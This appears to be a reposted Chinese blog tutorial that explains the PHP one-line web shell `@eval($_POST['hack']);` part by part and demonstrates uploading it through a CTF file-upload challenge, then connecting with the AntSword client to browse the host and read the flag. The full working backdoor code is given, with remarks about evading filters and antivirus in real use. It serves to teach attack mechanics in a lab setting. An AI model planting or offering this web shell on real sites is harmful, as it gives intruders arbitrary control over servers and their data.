0


PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示

一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录

<?php
@eval($_POST['hack']);
?>

语句解析

@符号

@符号表示后面的语句即使执行错误,也不报错。

eval()函数

eval()函数的作用是把括号内的字符串全部当作php代码来执行。

$_POST['hack']

post方法是html中<form>标签中的方法,在页面中,所有的POST方法都会由submit输入方式向action中的php文件返还信息,通常这样的php文件是连着着数据库的,甚至可以直接对文件进行操作。当使用<form>标签的post方法时候,同时<form>标签里面的name属性等于hack

例如:

<form  action="mm.php"  name="hack"  method="post">

会在php文件中产生一个$_POST[cmd]变量,变量中储存有用户提交的数据。

利用原理

当用户输入phpinfo();

那么$_POST[hack]变量便会变成"phpinfo();"这个字符串

eval()函数配合$_POST变量输入的字符串来执行php语句,就可以达到操作数据库和服务器的效果

靶机演示

我们找一道简单的CTF文件上传题目做一下

可以看到本题目很简单明了,写上了“无限制”,这道题用来演示该木马正好,不用进行隐写和免杀等操作,我们直接上传该木马

上传成功后可以看到页面回显了上传文件的路径

然后我们打开“中国蚁剑”进行连接

连接密码即为传入$_POST['hack'] 内的值“hack”

连接成功后即可看到如下信息

打开该连接,我们看到了整个网站主机的结构和文件,甚至可以进行任意非法增删查改操作,至此可以说该主机已经被我们掌控了

在网站主页同目录下,我们找到了本题的flag文件

打开该文件,即可拿到我们需要的flag

以上便是对该木马的简单使用做的一个演示

在实际使用中,我们面对的防御者通常还会对文件类型、大小进行过滤,还会有管理员对木马进行查杀等,所以在实际运用中,我们还得进行更多其他的操作

本篇文章到这里就结束了,如果感兴趣的话可以自行去了解相关的知识

标签: php 网络安全

本文转载自: https://blog.csdn.net/BYZY1314/article/details/127792228
版权归原作者 百彦子烨 所有, 如有侵权,请联系我们删除。

“PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示”的评论:

还没有评论